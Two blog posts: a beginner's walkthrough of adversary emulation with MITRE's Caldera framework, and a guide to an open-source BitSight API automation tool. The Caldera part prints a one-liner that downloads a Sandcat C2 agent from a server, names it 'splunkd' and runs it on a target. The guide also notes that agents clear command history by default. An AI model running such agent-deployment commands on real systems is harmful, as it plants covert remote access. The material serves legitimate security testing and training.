
A Beginner’s Guide to Adversary Emulation with Caldera

25 August 2023 at 07:00

Target Audience

The target audience for this blog post is individuals who have a basic understanding of cybersecurity concepts and terminology and are looking to expand their knowledge of adversary emulation. This post delves into the details of adversary emulation with the Caldera framework and explores the benefits it offers. By catering to a beginner-to-intermediate audience, the blog post aims to strike a balance between providing fundamental information for newcomers and offering valuable insights and techniques for individuals who are already familiar with the basics of cybersecurity.

What is Adversary Emulation

Adversary emulation is a methodology used to simulate the Tactics, Techniques, and Procedures (TTPs) used by known Advanced Persistent Threats (APTs), with the goal of identifying vulnerabilities in an organization’s security defenses. By emulating real-world attacks and incident response techniques, such as exploitation of vulnerabilities and lateral movement within a network, cybersecurity teams can gain a better understanding of their security posture and identify areas for improvement.

The Need for Adversary Emulation

Adversary emulation can help organizations test their security defenses against real-world threats. Some of the benefits adversary emulation offers are:

  • Identifying vulnerabilities: Adversary emulation assists organizations in identifying vulnerabilities, weaknesses or misconfigurations in their security defenses that might not have been detected through conventional security testing. This information can enhance the existing detection mechanisms by creating new alerts and rules that are triggered when similar activities are detected. The emulation results can also work as a guide in prioritizing mitigation and patching activities.
  • Improving security controls: By identifying weaknesses in their security defenses, organizations can make informed decisions about how to improve their security controls. This can include implementing new security technologies, updating security policies, or providing additional security awareness training to employees.
  • Measuring security effectiveness: Adversary emulation enables organizations to assess the effectiveness of their security defenses within a controlled environment. Through analyzing the emulation results, organizations can have a clearer understanding of how well their incident response plan operates in real-world scenarios. If any gaps or inefficiencies are identified, the plan can be refined based on the new data.
  • Staying ahead of emerging threats: Adversary emulation exercises can help organizations stay ahead of emerging threats by testing their security defenses against new and evolving attack techniques. This can help organizations prepare for future threats and ensure that their security defenses are effective in protecting against them.

Emulation vs. Simulation

Emulation involves creating a replica of a specific system or environment, such as an operating system, network, or application. It provides a more realistic testing environment, which can help identify vulnerabilities and test the effectiveness of security controls in a more accurate and reliable way. However, creating an emulation environment can be time-consuming and resource-intensive, and it may not always be feasible to replicate every aspect of a real-world environment.

Simulation, on the other hand, involves creating a hypothetical scenario that models a real-world attack. It is often quicker and easier to set up, and can be used to test response plans and procedures without the need for a complex emulation environment. However, simulations may not always provide a completely accurate representation of a real-world attack scenario, and the results may be less reliable than those obtained through emulation.

The Caldera Framework

MITRE’s Caldera project is an open-source platform that allows organizations to automatically emulate the tactics, techniques, and procedures (TTPs) used by real-world APTs. The platform is designed to be modular, which means that it can be customized to fit the specific needs of an organization. More information can be found in the official documentation and on GitHub. Red team operators can benefit from this by manually executing TTPs and blue team operators can run automated incident response actions. Caldera is also highly extensible, meaning that it can be integrated with other security tools to provide a comprehensive view of an organization’s security defenses. Moreover, it is built on the MITRE ATT&CK framework which is where the platform draws all the Tactics, Techniques and Procedures (TTPs) from.

The most common use cases of this framework include, but are not limited to:

  • Autonomous Red Team Engagements: This case is used to emulate the TTPs of known adversary profiles to discover gaps across an infrastructure, test the defenses currently in place and train operators on detecting different threats.
  • Manual Red Team Engagements: This case allows red team operators to replace or extend the attack capabilities of a scenario, giving them more freedom and control over the current emulation.
  • Autonomous Incident Response: This case is used by blue team operators to perform automated incident response actions to aid them in identifying TTPs and threats that other security solutions may not detect and/or prevent.

Caldera consists of two main components:

  • The core system, which is the framework’s code, including an asynchronous command-and-control (C2) server with a REST API and a web interface.
  • Plugins which are separate repositories that expand the core framework capabilities and provide additional functionality. Examples include agents, GUI interfaces, collections of TTPs and more.
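For reference, getting a local Caldera instance up and running typically looks like the following. This is a minimal sketch based on the official documentation; the exact steps, port and default credentials may differ per version, so check the project's README and the conf directory of your installation.

git clone https://github.com/mitre/caldera.git --recursive
cd caldera
pip3 install -r requirements.txt
python3 server.py --insecure

Once the server is up, the web interface is usually reachable at http://localhost:8888, where you can log in as the red or blue user.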

Figure 1 below shows the main menu we are greeted with when we log in as either the red or the blue user, along with some basic terminology.

Figure 1: Caldera’s Main Menu
  1. Agents: An agent is another name for a Remote Access Trojan (RAT). These programs, which can be written in any language, execute an adversary’s instructions on compromised systems (victims). Often, an agent will communicate back to the adversary’s server through an internet protocol such as HTTP, UDP or DNS. Agents also beacon to the C2 on a regular basis, asking the adversary whether there are new instructions. If a beacon misses a regularly scheduled interval, there is a chance the agent itself has been discovered and compromised.
  2. Abilities: An ability is a specific set of instructions to be run on a compromised host by an agent immediately after it sends its first beacon.
  3. Adversaries: Adversary profiles are groups of abilities, representing the tactics, techniques, and procedures (TTPs) of known real-world APT groups. Adversary profiles are used when running an operation to determine which abilities will be executed.
  4. Operations: An operation is an attack scenario which uses the TTPs of a pre-configured adversary profile. An operation can be run automatically, where the agents and the C2 server run without the operator’s interference and only the tasks in the adversary profile are executed. On the other hand, there is the manual mode, where the operator approves every command before it is tasked to an agent and executed; additionally, in manual mode the operator can add extra TTPs. In order to run an operation, at least one agent must be active.
  5. Plugins: Plugins provide additional functionality on top of the core framework.

Configuring an Agent

When we select “agents” from the menu shown in Figure 1, we are greeted with the page shown in Figure 2.

Figure 2: Agent’s Menu

If we select the “Configuration” button, a new window opens where we can configure different options for all the agents created afterwards.

Figure 3: Agent’s Configuration Menu
  • Beacon Timer(s) = This field sets the minimum and maximum number of seconds the agent will take to beacon back home.
  • Watchdog Timer(s) = This field sets the number of seconds an agent has to wait, if the server is unreachable, before it is killed.
  • Untrusted Timer(s) = This field sets the number of seconds the server has to wait before marking a missing or unresponsive agent as untrusted. Furthermore, operations will not generate new links or send new instructions to untrusted agents.
  • Implant Name = This field sets the name for the newly created agents.
  • Bootstrap Abilities = This is a list of abilities to be run when a new agent beacons back to the server. By default, it runs a command which clears the command history.
  • Deadman Abilities = This is a list of abilities to be run immediately before an agent is killed.

To deploy an agent, we can press the “Deploy an Agent” button. For this example, the Sandcat agent will be used.

Deploying an agent refers to the process of installing and setting up the agent on the target system so that it can perform specific actions or functions, such as monitoring, management, data collection, exploitation, reconnaissance and many more.

In figure 4, we can select the agent we want to deploy.

Figure 4: Agent Selection

Next, in figure 5, we have to select the operating systems the agent will be deployed on.

Figure 5: Agent Platform Selection

In this example, the Linux operating system has been chosen and Caldera provides us with some options and some pre-built commands. These commands can be copied and run directly in the victim’s terminal to deploy the agent. There are different variations for the deployment of the selected agent, such as:

  • It can be deployed as a red or blue agent.
  • It can be downloaded with a random name and start as a background process.
  • It can be deployed as a peer-to-peer (P2P) agent with known peers included in the compiled agent.

Moreover, the settings that can be modified are:

  • app.contact.http = This field is where the URL of the server’s address can be specified.
  • agents.implant_name = This field represents the name of the agent binary.
  • agent.extensions = This field takes a list of agent extensions to compile with the binary.
Figure 6: Agent’s Deployment Options
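To illustrate, the pre-built Linux one-liner generated by Caldera for the Sandcat agent typically looks similar to the sketch below. The server address is a placeholder and the exact command may vary between Caldera versions, so always copy the command generated by your own instance.

server="http://192.168.0.10:8888";
curl -s -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download > splunkd;
chmod +x splunkd;
./splunkd -server $server -group red -v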

After an agent has been deployed it will be shown in the agent’s window, as illustrated in Figure 7.

Figure 7: Active Agents

If an agent is selected, a new window opens that shows some settings that can be modified along with some information about the system the agent is installed on and a kill switch, as shown in figure 8.

Figure 8: Agent’s Options After Deployment
  • Contact = This field specifies the protocol in which the agent will communicate with the server.
  • Sleeper Timer = This is the same as the Beacon Timer(s).

Configuring an Adversary Profile

Caldera comes with pre-defined profiles to choose from, loaded with known TTPs. There is also the option to create a new profile with mixed TTPs, providing an operator more flexibility over the operation. An adversary profile can be created and configured in the “adversaries” window as shown below in figure 9.

Figure 9: Creating A New Adversary Profile

After the “New profile” button is pressed, we will be asked for a name and a description for the new adversary profile.

A new ability can be added to the newly created profile by pressing the “add Ability” button.

Figure 10: Adding an Ability To an Adversary Profile

Then a new window will open where the specific ability can be chosen and configured, as depicted in figure 11.

Figure 11: Configuring an Ability

Here an already existing ability can be added by searching for it in the search bar or a new one can be configured by choosing a specific Tactic, Technique and Ability as shown above, along with all the details shown in the “Ability Details” section.

This newly created ability can be added to the TTPs of an already existing adversary profile by pressing the “Add Adversary” button. A new window will open to choose the appropriate profile.

Figure 12: Choosing an Adversary Profile

Finally, by pressing the “Save Profile” button the new profile is created and can be added to an operation.

Figure 13: Save The New Profile

Configuring an Operation

An operation can be created and configured in the “operations” window.

Figure 14: Creating A New Operation

After that a new window will open with all the modifiable settings.

Figure 15: Operation’s Configuration
  • Operation Name = Specifies the name of the operation.
  • Adversary = Specifies a specific adversary profile to emulate along with the pre-configured TTPs associated with this profile.
  • Fact Source = In this field a fact source can be attached to the current operation. This means that the operation will start with some knowledge of facts, which can be used to fill in different variables inside some abilities. A fact is identifiable information about the target machine that can be used by some abilities, such as usernames, passwords, hostnames, etc.
  • Group = Specifies the collection of agents to run against.
  • Planner = Specifies which logic library to use for the current operation. A planner is a Python module which contains logic that allows a running operation to make decisions about which abilities to use and in what order. The default planner is the “Atomic” which sends a single ability command to each agent in a group at a time. The order in which the commands are sent is the same as in the adversary’s profile.
  • Obfuscators = This field specifies which obfuscator to use to encode each command before they are sent to the agents. The available options are:
    • Base64 = Encodes the commands in base64
    • Base64jumble = Encodes the commands in base64 and then adds characters
    • Base64noPadding = Encodes the commands in base64 and then removes padding
    • Caesar cipher = Obfuscates the commands with the Caesar cipher algorithm
    • Plain text = No obfuscation
    • Steganography = Obfuscates the commands with image-based steganography
  • Autonomous = Specifies if the operations will run autonomously or manually. In manual mode the operator will have to approve each command.
  • Parser = Parsers are Python modules that are used to extract facts from command outputs. For instance, some reconnaissance commands can output file paths, usernames, passwords, shares, etc. These facts can then be fed back into future abilities. Parsers can also be used to create facts with relationships between them, such as username and password facts.
  • Auto-close = This option automatically terminates the operation when there are no further actions left. Alternatively, it keeps the operation open until the operator terminates it manually.
  • Run state = This option either pauses the operation on start or runs it immediately.
  • Jitter = Specifies the minimum and maximum number of seconds between an agent’s check-ins with the server while it is part of an active operation.
  • Visibility = This option specifies how visible the operation should be to the defense. Abilities with higher visibility than the operation’s will be skipped.

After the “start” button is pressed, the operation starts and the results are shown on the screen, indicating whether each task fails or succeeds. There is also the option to view each command and its output, as illustrated in Figure 16.

Figure 16: Operation’s results
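Operation results can also be retrieved programmatically. The sketch below assumes Caldera’s v2 REST API and the default red API key (ADMIN123); both the endpoint and the key are assumptions that should be verified against your installation’s configuration (conf/default.yml).

curl -s -H "KEY: ADMIN123" http://localhost:8888/api/v2/operations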

This was a red team operation, but in order to see the full picture some security solutions should also be running on the target systems to examine what was prevented and what went undetected.

Configure Automated Incident Response Plan

To form an incident response plan the “blue” user must be logged in.

The blue team’s main menu is a little different from the red team’s. The main change is the “response” plugin, which is the counterpart of the threat emulation plugins. At the time of writing this blog post, it contains 37 abilities and 4 defender profiles that focus on detection and response actions.

In the “Defenders” tab, a new custom defender profile can be created and configured in the same way as the adversary profiles.

Figure 17: Incident Responder Section

The profiles included in this plugin are:

  • Incident Responder
  • Elastic Hunter
  • Query Sysmon
  • Task Hunter

All available abilities for each defender profile can be viewed in the “abilities” section, after the specific profile has been chosen from the “response” tab, as shown in figure 17.

Figure 18: Defender Abilities

Defender abilities are classified into four different tactics:

  • Setup: These abilities prepare information to be used by other abilities
  • Detect: These abilities focus on finding suspicious behavior by continuously monitoring the ingested information and run as long as the operation is active.
  • Response: These abilities act autonomously once suspicious behavior is detected. Such actions include killing a process, modifying firewall rules, deleting a file and so on.
  • Hunt: These abilities focus on searching for Indicators of Compromise (IOCs) via logs or file hashes.

Blue team operations are configured the same way as red team operations. The main differences in the procedure are that the agent must be deployed as blue instead of red, a defender profile must be selected in the “adversary” option, and the “response” option must be selected in the Fact source section.

Figure 19: Deploy Blue Agent
Figure 20: Configuring A Blue Team Operation

The result structure is the same as for a red team operation: the commands and their output are shown, along with whether they were successful or not.

Conclusion

In conclusion, leveraging the Caldera framework for adversary emulation presents a robust and proactive approach to enhancing cybersecurity defenses. Through the simulation of real-world attack scenarios, organizations can acquire invaluable insights into potential vulnerabilities and subsequently strengthen their incident response capabilities. The flexibility, modularity, and extensibility of Caldera establish it as an ideal tool for executing sophisticated emulation exercises.

By harnessing adversary emulation in conjunction with the Caldera framework, cybersecurity experts are equipped with the means to proactively safeguard their organizations against potential threats.


Konstantinos Pantazis

Konstantinos is a SOC analyst for NVISO security.
When he is not handling alerts, he is usually sharpening his skills for purple teaming.

Introducing BitSight Automation Tool

8 August 2023 at 07:00
  1. Glossary
  2. Introduction
  3. BitSight
  4. Automation
    1. Operations
  5. Structure
  6. Installation
    1. Prerequisites
    2. Configuration
    3. Generating an API key for your BitSight account
    4. Adding the API Key to the BitSight Automation Tool
      1. Windows
      2. Linux
    5. The group_mapper.json file
    6. The guid_mapper.json file
    7. Configuring your Company’s structure
      1. The groups.conf file
      2. Letting BitSight Automation Tool handle the rest
    8. Binding into Executable
  7. Execution
    1. Usage
    2. Use Cases
      1. Functional Operation: Rating
      2. Functional Operation: Historical
      3. Functional Operations: Findings
      4. Functional Operation: Assets
      5. Functional Operation: Reverse Lookup
      6. Supplementary Operation: List
      7. Supplementary Operation: Update
    3. Task Scheduler / Cron Jobs
      1. Windows – Task Scheduler
      2. Linux – Cron Jobs
  8. Troubleshooting
    1. Total Risk Monitoring Subscription Required
    2. File not Found *.JSON
  9. Conclusion

Glossary

  • Entity: A part of an organization that can be assessed as a single figure.
  • Subsidiary: Same as an Entity on BitSight’s side.
  • Group Cluster: A complex. It can contain entities/subsidiaries, Groups, or more Group Clusters.
  • Group: A structure that can contain Entities.

Introduction

In this blog post you will be introduced to the BitSight Automation Tool (https://github.com/NVISOsecurity/BitSight-Automation-Tool). BitSight Automation was developed to automate certain manual procedures and extract information such as ratings, assets, findings, etc. Automating most of these tasks is crucial for simplicity and time saving. Besides that, the tool can also be combined with Scheduled Tasks and cron jobs: you can configure it to execute at certain intervals or dates and retrieve the results from the desired folder without needing to interact with it.

BitSight

What is BitSight? BitSight is a solution that helps organizations perform three (3) main functions.

  1. Quantify their cyber risk
  2. Measure the impact of their security efforts
  3. Benchmark their performance against peers

It does all that by managing the company’s external-facing infrastructure both automatically and manually, allowing a company to provide updates to BitSight in order to keep its database up to date.

Other functions that are useful and provided by BitSight are:

  • Performing periodic vulnerability assessments on those assets to determine the risk factors and reporting back the findings.
  • Identifying malicious activity, such as botnet infections, that adds to the risk factor.
  • Providing detailed remediation tips to remediate findings.

Automation

By utilizing parts of the BitSight API Python wrapper developed by InfosecSapper, we developed an open-source tool for the community to use that fully automates some of BitSight’s operations, which we have named the BitSight Automation Tool. This tool has a lot of potential to expand further with even more operations based on the needs that might arise.

Operations

You might be wondering by this point: what operations can this tool automate? Currently there are 5 operations that can be automated, plus 2 supplementary operations that assist with the tool’s maintenance.

  1. Rating -> Retrieve the current score of an entity and confirm it’s above or equal to your company’s required security policies or digital mandate.
  2. Findings -> Generate a filtered list of vulnerabilities for an entity to remediate.
  3. Assets -> Retrieve the asset count and asset list of an entity, to validate your public IP space.
  4. Reverse Lookup -> Investigate where an IP, IP Range, domain or domain wildcard is attributed to and what IPs or domains it is associated with.
  5. Historical Ratings -> Sets up an overview of ratings for a given entity or group over a specified timeframe (maximum 1 year) to showcase in reports and review progress or regress.
  • List ->  Review the correlation between an entity’s custom given name and BitSight’s given name in a list for all defined entities.
  • Update -> Automatically update the tool and its respective JSON files.

Structure

The below image is a representation of the current state of the tool. At the time of writing the tool comes with the following structure.

  • BitSightAPI: This folder contains certain vital Python files from the BitSightAPI Python wrapper.
  • ArgumentsHandler.py: This file contains the instructions on how to parse the tool’s arguments.
  • README.md: This file is your friend. It contains all the information on how to execute with examples, as well as troubleshooting advice.
  • bitsight_automation.py: This file is the heart of the tool. You can execute this Python file and use it for your Scheduled tasks or cron jobs.
  • group_mapper.json: This file is a JSON structure which represents the mapping of the groups and entities within your organization. (More on this in a dedicated section)
  • guid_mapper.json: This file is a JSON structure which represents the mapping of the entities and their respective GUIDs assigned to them by BitSight. (A GUID is the unique handle used by BitSight to identify your subsidiary)
  • groups.conf: This file is the main configuration to define your groups. It defines the groups which the tool will interact with.
  • requirements.txt: This file indicates all the required libraries for the tool to operate.
Figure 1: Files Diagram

Installation

Prerequisites

In order to use the tool, we first need to install it. Regardless of the Operating System you are using, you will need to have Python installed. The tool has been tested with Python 3.8 and 3.11 at the time of writing, so any Python 3.x.x version should work.

Note: When installing Python make sure to include it in your PATH and include the PIP package manager as well.

Next step would be to install the tool’s requirements. To do so, navigate to the tool’s directory within a command prompt / terminal or PowerShell window and execute the following command: `pip install -r requirements.txt`
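Optionally, you may prefer to install the requirements in a Python virtual environment to keep them isolated from your system packages. This is generic Python practice and not a requirement of the tool:

python -m venv venv
source venv/bin/activate    (on Windows: venv\Scripts\activate)
pip install -r requirements.txt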

All the prerequisites are installed at this point, but we still have a couple more steps to perform before we can use the tool.

Configuration

Now that you have installed the prerequisites, we are one step closer to utilizing the tool. Before we do so, we need to update a couple of files.

Generating an API key for your BitSight account

First you need to generate an API key from your account in BitSight. To do so,

  1. Login to your BitSight account
  2. On the top right corner of the UI, click on Settings.
  3. Select Account
  4. Scroll down until you see an “API Token” section
  5. Select “Generate API Token”
  6. Copy the newly generated token.

Adding the API Key to the BitSight Automation Tool

In order for the BitSight Automation Tool to use this API key, you need to include it as an environmental variable in the system you will be running the tool on. We’ll do so below for both Windows and Linux.

Windows

For Windows systems,

  1. Open the search menu
  2. Search for “Edit the System Environment Variables”
  3. Select that option
  4. Select “Environment Variables”
  5. In the “User Variables” section, click “New”
  6. In the “Variable Name” field, add the value “BITSIGHT_API_KEY”
  7. In the “Variable Value” field, add the generated token you copied in the previous section.
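Alternatively, if you prefer the command line, the same user-level variable can be set from a command prompt with the built-in setx command (open a new terminal afterwards for the change to take effect):

setx BITSIGHT_API_KEY "<your-token>"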

Linux

For Linux systems,

  1. Open a terminal
  2. Replace the “{token}” section with your token, and execute the following command:
echo export BITSIGHT_API_KEY={token} >> ~/.bashrc
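Afterwards, reload your shell configuration and verify that the variable is set; this is just a quick sanity check and not part of the tool itself:

source ~/.bashrc
echo $BITSIGHT_API_KEY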

The group_mapper.json file

This file is the heart of the tool. It will be queried to retrieve entities for every operation.

An example of a group_mapper.json file can be found below.

{
    "Root":[
      {"Group1": "Single Entity"},
      {"Cluster Group2": ["EntityOne", "EntityTwo", "EntityThree"]},
      {"Bigger Cluster Group3": [
        {"SubCluster": ["Entity1", "Entity2"]},
        {"SubCluster2": ["EntityUno", "EntityDos"]}
      ]},
      "Random Entity that sits alone under the root"
    ]
}

The grouping of subsidiaries can be organized as shown above. A few rules apply:

  • All of your subsidiaries must be under the “Root” subsidiary. The “Root” Subsidiary is your main subscription in BitSight that contains all the others (if any).
  • The Root subsidiary contains a list of other group subsidiaries or subsidiaries that are directly under the Root.
  • A Group or Group Cluster subsidiary can hold one, or more subsidiaries.
  • You can define bigger Cluster Group subsidiaries that contain even more group subsidiaries, which in turn can contain more subsidiaries.
  • You can create your own Group subsidiaries even if they don’t exist in BitSight for better structuring.
  • You can use your own naming conventions for all your subsidiaries and group subsidiaries without affecting BitSight or the retrieved information.

The guid_mapper.json file

This file is the tie between BitSight and the BitSight Automation Tool. This is where the magic happens: your naming conventions are related back to specific subsidiaries within BitSight.

An example of a guid_mapper.json file can be found below.

{
    "Root": "463862495-ab29-32829-325829304823",
    "Group1": "463862495-ab29-32829-325829304824"
}

This structure is the most basic structure you can have. The only thing you have to do is to create a new line for each subsidiary and assign its GUID from BitSight.

Below you may find a few rules that apply when adding the GUIDs for the subsidiaries:

  • The order doesn’t matter.
  • Make sure you use the exact naming convention you used on the group_mapper.json file. (It’s case sensitive)
  • Do not add any lists or other structures in this file. It should be one line for every subsidiary.
  • For groups you added in group_mapper.json file, that do not exist in BitSight, add a line like the following: “{your-group}”:”-“,

Configuring your Company’s structure

This step is mandatory for the tool to operate correctly. You can either use BitSight’s structure or you can create your own that suits best for your company.

Figure 2: Update Example

The groups.conf file

Once you have completed the above steps, you need to modify one last item in the configuration of the tool.

The ‘groups.conf’ file structure should look like below (Figure 3)

Figure 3: Groups Modification

You can add your groups one per line.

Note: Do not modify the first line. It should remain as is [Groups].

Letting BitSight Automation Tool handle the rest

You have completed the manual part of the configuration! Pretty simple, right?

Execute the tool with the update operation.

python bitsight_automation.py update

This will go through BitSight and find any subsidiaries that are missing from the configuration. It will then prompt you to include them. Follow the steps, provide the required information and the tool will take care of the rest.

Example:

PS C:\Users\Konstantinos Pap\Desktop\BitSight Automation> python .\bitsight_automation.py update

Subsidiary Name – GUID not found in our configuration

Would you like to include it (Y/N)? y
What is the name of this entity? Test
Under which group should this entity fall under({your-groups}) ? myTestGroup
Adding Subsidiary Name with guid {GUID} as Test in myTestGroup

Configuration Updated

Binding into Executable

Before we dive into how to utilize this tool, let’s first look at how we can make an executable bundle for it. Performing this step allows for easier sharing and makes the tool usable by anyone, from analyst to CISO, without any specific requirements. We can use PyInstaller to create the standalone .exe file.

  1. First, open a terminal
  2. Now, we need to install pyinstaller. Use the `pip install pyinstaller` command to download and install pyinstaller.
  3. Afterwards, navigate into the tool’s directory from within the terminal window.
  4. Execute the following command: “pyinstaller bitsight_automation.py -p __pycache__ -F”

Wait for a few seconds and notice there is a new directory created named “dist”. Grab the 2 .json files and the README.md file and copy them into the dist directory. Zip the contents of that directory and distribute that bundle on any Windows system. It will execute without any need for dependencies.
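As a PowerShell sketch of that packaging step (file names as described above, adjust paths to your own setup):

Copy-Item .\group_mapper.json, .\guid_mapper.json, .\README.md -Destination .\dist\
Compress-Archive -Path .\dist\* -DestinationPath .\BitSight-Automation-bundle.zip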

Note: You still have to export the environment variables to the new machines in order for the tool to be able to connect to BitSight.

Execution

Now that we have installed and fully configured the BitSight Automation Tool, we can go ahead and use its capabilities. As already mentioned, the tool allows for 5 different operations plus 2 supplementary ones to assist with its maintenance.

We’ll first have a look at the usage menu of the tool and then we’ll navigate over a breakdown of each operation and how it works with examples.

Usage

Invoke the tool with its --help attribute.

PS ~/> python .\bitsight_automation.py --help

usage: bitsight_automation.py [-h] [-g {{your-groups}}] [-e ENTITY] [-v]
                              [-s {All,Critical-High,Critical,High,Low,Medium}]
                              [-so {alphanumerically,alphabetically}] [--search SEARCH] [--months MONTHS]
                              {rating,historical,findings,assets,reverse_lookup,list,update}

BitSight Automation tool to automate certain operations like historical report generation, findings categorization, asset list retrieval, reverse lookup of IP addresses and current ratings for entites

positional arguments:
  {rating,historical,findings,assets,reverse_lookup,list,update}
                        The operation to perform.

optional arguments:
  -h, --help            show this help message and exit
  -g {{your-groups}}, --group {{your-groups}} The group of entities you want to query data for.
  -e ENTITY, --entity ENTITY A specific entity you want to query data for
  -v, --verbose         Increase output verbosity
  -s {All,Critical-High,Critical,High,Low,Medium}, --severity {All,Critical-High,Critical,High,Low,Medium}
                        Level of Severity to be captured
  -so {alphanumerically,alphabetically}, --sort {alphanumerically,alphabetically}
                        Sort rating results either alphanumerically or alphabetically.
  --search SEARCH       IP or Domain to reverse lookup for.
  --months MONTHS       Add in how many months back you want to view data for. If you want 1 year, fill in 12 months.
                        Max is 12

For any questions or feedback feel free to reach out to [email protected]

Use Cases

Now we will go through a breakdown of all the different use cases within the BitSight Automation Tool. We’ll go through the functional operations first and leave the 2 supplementary ones for the end.

Each operation requires different arguments. The tool will let you know if you missed something during runtime. Example output:

[-] You need to specify one of the arguments --country or --region.

Functional Operation: Rating

Use the rating operation to retrieve the current score of an entity or group in order to confirm if it’s above or equal to your policies. If a group is supplied this operation will output all of the subsidiaries under the specified group in the order you specified them in the JSON files (You also have the option to sort them alphanumerically)

Let’s try to fetch the current rating for our “Test” subsidiary.

PS ~/> python .\bitsight_automation.py rating -e Test

Test - 790
[+] Data saved to: 2023-03-17_bitsight_rating_Test.txt

Our Test Subsidiary has a score of 790. That’s an advanced score, so we can cross-verify with the company’s policies and take further action if needed. The results are also saved as a TXT file to allow easy copy/paste if required.

We can do the same thing for our Group and retrieve all the scores from all subsidiaries under our “Test Group”.

PS ~/> python .\bitsight_automation.py rating -g "Test Group"

[*] This may take a moment. Grab a coffee
Working on Test Group...
Test Group – 660
EntityOne - 620
Test Entity 2 - 760
EntityTwo - 770
[+] Data saved to: 2023-03-17_bitsight_rating_Test Group.txt

Notice that we have retrieved ratings for all subsidiaries under “Test Group” in addition to the rating of “Test Group” itself. Some additional notes:

  • If “Test Group” didn’t have a GUID then it will not pull any data for it.
  • You can change the sorting algorithm using the -so argument.
  • You can retrieve the rating of “Test Group” without having to go through its subsidiaries. To do so, you can treat it like a normal entity, supplying it with the -e argument instead.
  • If your group is a big cluster group containing more groups that contain more subsidiaries, the tool will recursively query BitSight for all those groups and subsidiaries under the cluster group and its respective groups and subsidiaries. (In other words, nothing will be skipped.)
  • You can use -g {Root} to retrieve ratings for all the subsidiaries in your company. (Replace {Root} with the name you have given it)
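For example, based on the -so option from the usage output above, the same group rating can be requested sorted alphabetically (a sketch, your group names will differ):

PS ~/> python .\bitsight_automation.py rating -g "Test Group" -so alphabetically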

Functional Operation: Historical

Use the historical operation to set up an overview of ratings for a given subsidiary or group over a specified timeframe (maximum 12 months) to showcase in reports and review progress or regress. Typically this operation is used with the -g argument but you can also utilize the -e argument for a given subsidiary only.

Let’s try to generate a report for our previous “Test Group” and its subsidiaries for the past year.

PS ~/> python .\bitsight_automation.py historical -g "Test Group" --months 12

Grab a coffee, this will take a while...
Working on Test Group...
[+] Data saved to 2023-03-17_Test Group_bitsight_historical_ratings_12_months.xlsx

Note: This command might take some time depending on the size of your organization and the number of subsidiaries it has to query data for. In any case, it is verbose enough to let you know which group it is working on at each step, so if you supplied a big cluster group you will have real-time output of the progress.

The report:

Figure 4: Historical Report

There is a legend in the second sheet (tab) of the Excel file that denotes what these colors are and their scores – aligned with BitSight’s ratings and color coding.

Figure 5: Historical Score Indication

Note: You can generate these types of reports with no limitation to a number of subsidiaries. You can even generate it for the entire organization using the Root subsidiary.

Functional Operations: Findings

Use the findings operation to generate a filtered list of vulnerabilities for a subsidiary to remediate. This operation works solely with subsidiaries and not groups! You also need to supply the severity level with the -s argument.

Note: Your subsidiaries need to have a ‘Total Risk Monitoring’ subscription for this command to work. Otherwise it will produce an error.

Let’s retrieve the findings for our ‘EntityOne’ subsidiary under ‘Test Group’ we used earlier. We will retrieve the Critical vulnerabilities only.

PS ~/> Python .\bitsight_automation.py findings -e EntityOne -s Critical

[+] Data saved to bitsight_Critical_findings_EntityOne_2023-03-17.csv

Critical findings were downloaded and saved to a file called ‘bitsight_Critical_findings_EntityOne_2023-03-17.csv’. You can now start working on remediating the findings or assign it to the proper internal team.

Functional Operation: Assets

Use the assets operation to retrieve the asset count and asset list of a subsidiary in order to validate your public IP space. This operation works solely with subsidiaries and not groups. This is a two-step process of querying. The operation first queries BitSight to retrieve the total count of public IPs in your subsidiary and then queries for the detailed asset list.

Note: This command requires a ‘Total Risk Monitoring’ subscription. If one is not available this command will produce an error.

Let’s attempt to retrieve the asset list for our ‘EntityOne’ subsidiary from the previous examples.

PS ~/ > python .\bitsight_automation.py assets -e EntityOne

EntityOne - 1410
*********** Asset List ************
[+] Asset List saved to: bitsight_asset_list_EntityOne_2023-03-17.csv

Note: This command will only fetch assets that are correctly attributed to this subsidiary. There’s a difference between correctly attributed by BitSight and internal/private Tagging.

Functional Operation: Reverse Lookup

Use this command to investigate where an IP, IP Range, domain or domain wildcard is attributed to and what IPs or domains it is associated with. This command only requires the --search argument.

Let’s attempt to find out where our test.com domain is attributed to and what public IPs it is associated with.

PS ~/> python .\bitsight_automation.py reverse_lookup --search test.com

test.com - ['<Redacted XX.XXX.XX.XXX>']: Found in: EntityOne

Supplementary Operation: List

Use this operation to review the correlation between an entity’s custom given name and BitSight’s given name in a list for all defined entities. This command does not require any arguments.

Let’s view our subsidiaries and their correlation to BitSight.

PS ~/> Python .\bitsight_automation.py list

Listing Configuration...
Root – My Test BitSight Organization
Group One – First Group Subsidiary
EntityOne- Entity1 Test
Test Entity 2- Entity 2 Test
EntityTwo – SSEntity 2

Note: The mapping is {my JSON representation – BitSight’s representation}. The two names are bound over the GUID unique value for a subsidiary.

Supplementary Operation: Update

Use this operation to automatically update the tool and its respective JSON files. We already saw how this command works in the configuration section.

Task Scheduler / Cron Jobs

As we already mentioned, we can either manually execute the BitSight Automation Tool or set it up to execute automatically on a recurring schedule. This is relatively easy to achieve in both Linux and Windows operating systems.

Windows – Task Scheduler

To achieve this in Windows we need to utilize the Task Scheduler utility provided by Microsoft itself. No need to download or install any additional software. Let’s configure it.

  1. Open the Task Scheduler.
  2. On the top left, select “Task Scheduler Library“. (Figure 6)
Figure 6: Task Scheduler Library
  3. On the top right, select “Create Basic Task” (Figure 7)
Figure 7: Create Basic Task
  4. Write down a name and description like below (Figure 8):
Figure 8: Creating Basic Task
  5. Then click “Next”
  6. Select a Monthly trigger and click Next (Figure 9)
Figure 9: Selecting Interval
  7. Next, select the dates on which you wish to execute. I will select all months, run on every 1st Monday of the month, and click Next (Figure 10).
Figure 10: Selecting Timeframe
  8. Choose “Start a Program” and click Next (Figure 11).
Figure 11: Selecting Action
  9. Browse to the bitsight_automation.exe file you created earlier for the “Program/Tool” field. For the arguments field, supply “historical -g {your-group} --months XX”, replacing {your-group} with the group you wish to execute for and XX with how many months back you want (remember, it’s up to 12 months maximum). For the “Start in (Optional)” field, add the path to the executable. This is required here because the BitSight Automation Tool expects the JSON files in the same directory it is executing from. Finally, click Next (Figure 12).
Figure 12: Configuring the Program and Arguments
  10. Verify all is correct and click Finish.

Your scheduled task is ready. You can manually invoke it once to verify it’s working correctly by selecting “Run” from the bar on the right (Figure 13).

Figure 13: Running the task

Note: You can follow this procedure for other tasks as well. (Update is excluded, as it requires manual intervention. However, the shell or prompt that opens will be interactive, so you can issue update commands on a daily basis anyway, and if there are any updates, you can interact with the tool.)

Linux – Cron Jobs

